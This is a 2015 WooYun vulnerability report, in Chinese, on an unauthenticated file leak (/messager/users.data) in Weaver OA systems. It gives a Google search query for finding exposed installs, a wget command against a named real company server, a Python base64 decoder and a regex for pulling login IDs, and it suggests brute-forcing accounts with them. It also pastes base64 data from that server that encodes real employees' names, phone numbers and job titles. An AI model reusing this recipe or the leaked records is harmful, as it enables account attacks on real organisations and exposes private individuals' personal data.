当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129483

漏洞标题:泛微OA系统敏感文件未授权访问

相关厂商:上海泛微软件有限公司

漏洞作者: 路人甲

提交时间:2015-07-28 19:15

修复时间:2015-10-28 09:48

公开时间:2015-10-28 09:48

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向第三方安全合作伙伴开放
2015-09-23: 细节向核心白帽子及相关领域专家公开
2015-10-03: 细节向普通白帽子公开
2015-10-13: 细节向实习白帽子公开
2015-10-28: 细节向公众公开

简要描述:

泛微OA系统敏感文件未授权访问,可导致所有员工组织架构信息泄露,并可被用来进行暴力破解等一系列利用。

详细说明:

存在问题的文件:/messager/users.data
具体版本没统计,在google上获取的大部分都存在该问题。
威胁:可导致所有员工组织架构信息泄露,包括loginid、姓名、电话、手机号、邮箱、头像uri、部门、职位等。
users.data文件本身是经过base64编码的,不知道拿来做啥用的。
验证url:http://target/messager/users.data
得到的内容类似:

1.png


解码后:

2.png


另外还有个日志泄漏的问题,貌似有人提过了,泄漏的日志里如果有loginid的话,其实也是可以暴力破解的,只要登录一个帐号,便可导出所有员工数据。
base64解码:

#!/usr/bin/ python
# -*- coding: utf8 -*-
import base64
fp1 = open('users.data','r')
fp2 = open('users.data2','w')
str1 = fp1.readlines()
for line in str1:
    str2 = base64.b64decode(line)
    fp2.write(str2)
fp1.close()
fp2.close()


提取loginid等可用正则或者bs4等。
提取loginid可用正则:\b(?<=<loginid>)\w+(?=</loginid>)\b
反斜杠被转义了,使用时记得去掉。

漏洞证明:

在google上搜索关键字看看。
intitle:协同商务系统 inurl:login

3.png


比如这个:
oa.hnnc.net:82/login/login4.jsp
wget http://oa.hnnc.net:82/messager/users.data

4.png


部分base64数据如下

PHVzZXJzPg0KPHJvdz48aWQ+NzYzPC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPrLc
896+6TwvbGFzdG5hbWU+PHNleD4xPC9zZXg+PHN1YmNvbXBhbnk+vK/Nxdfcsr88L3N1YmNvbXBh
bnk+PGRlcGFydG1lbnQ+vK/NxdDQ1f7Iy8Gm18rUtLK/PC9kZXBhcnRtZW50Pjx0ZWxlcGhvbmU+
ODY2NzAwMTg8L3RlbGVwaG9uZT48bW9iaWxlPjE4NjM4NjkyOTE1PC9tb2JpbGU+PGVtYWlsPjwv
ZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci91c2VyaWNvbi9sb2dpbmlkMjAxMzEyMjYxODA3
NDYuanBnPC9tZXNzYWdlcnVybD48c3VwZXJpb3I+tsW35Twvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+
ODwvc3VwZXJpb3JpZD48am9idGl0bGU+0NDV/sjLwabXytS0sr/X3LzgPC9qb2J0aXRsZT48L3Jv
dz4NCjxyb3c+PGlkPjU4OTwvaWQ+PGxvZ2luaWQ+YTAwMDEyPC9sb2dpbmlkPjxsYXN0bmFtZT7N
9dHgPC9sYXN0bmFtZT48c2V4PjE8L3NleD48c3ViY29tcGFueT6608TPyPC+9Mb7s7XP+srbt/7O
8dPQz965q8u+PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PsjwvvTG87ncsr88L2RlcGFydG1lbnQ+
PHRlbGVwaG9uZT48L3RlbGVwaG9uZT48bW9iaWxlPjEzNzgzNjcwNTc3PC9tb2JpbGU+PGVtYWls
PjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFnZXMvaWNvbl93LmpwZzwvbWVzc2Fn
ZXJ1cmw+PHN1cGVyaW9yPsH1yPC7qjwvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+NDM2PC9zdXBlcmlv
cmlkPjxqb2J0aXRsZT7I8L70xvO53LK/vq3A7Twvam9idGl0bGU+PC9yb3c+DQo8cm93PjxpZD4z
PC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPuqwt8k8L2xhc3RuYW1lPjxzZXg+MDwv
c2V4PjxzdWJjb21wYW55PryvzcXX3LK/PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PryvzcXX3L6t
sOw8L2RlcGFydG1lbnQ+PHRlbGVwaG9uZT4wMzcxLTYwMTAzMzc3PC90ZWxlcGhvbmU+PG1vYmls
ZT4xMzYzMzgzOTg3OTwvbW9iaWxlPjxlbWFpbD48L2VtYWlsPjxtZXNzYWdlcnVybD4vbWVzc2Fn
ZXIvaW1hZ2VzL2ljb25fbS5qcGc8L21lc3NhZ2VydXJsPjxzdXBlcmlvcj65+ce/PC9zdXBlcmlv
cj48c3VwZXJpb3JpZD4xMDU8L3N1cGVyaW9yaWQ+PGpvYnRpdGxlPryvzcXX3L6twO3W+sDtPC9q
b2J0aXRsZT48L3Jvdz4NCjxyb3c+PGlkPjQ8L2lkPjxsb2dpbmlkPnhzZ3N6amJ5c3k8L2xvZ2lu
aWQ+PGxhc3RuYW1lPs/6ytu5q8u+19y+rbDs1KTL49SxPC9sYXN0bmFtZT48c2V4PjA8L3NleD48
c3ViY29tcGFueT6608TP0MLKwLzNxvuztc/6ytu3/s7x09DP3rmry748L3N1YmNvbXBhbnk+PGRl
cGFydG1lbnQ+z/rK29fcvq2w7DwvZGVwYXJ0bWVudD48dGVsZXBob25lPjwvdGVsZXBob25lPjxt
b2JpbGU+PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFn
ZXMvaWNvbl9tLmpwZzwvbWVzc2FnZXJ1cmw+PHN1cGVyaW9yPrn5x+w8L3N1cGVyaW9yPjxzdXBl
cmlvcmlkPjQyPC9zdXBlcmlvcmlkPjxqb2J0aXRsZT6yv8PF1KTL49SxPC9qb2J0aXRsZT48L3Jv


解码后:

5.png


6.png


可以看到有7000多行数据。
各家公司赶紧自查吧。

修复方案:

1、users.data这个文件不知道是做啥用的,不建议保存在网站目录内。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-30 09:46

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过以往联系渠道向软件生产厂商邮件通报,由其后续提供解决方案。

最新状态:

暂无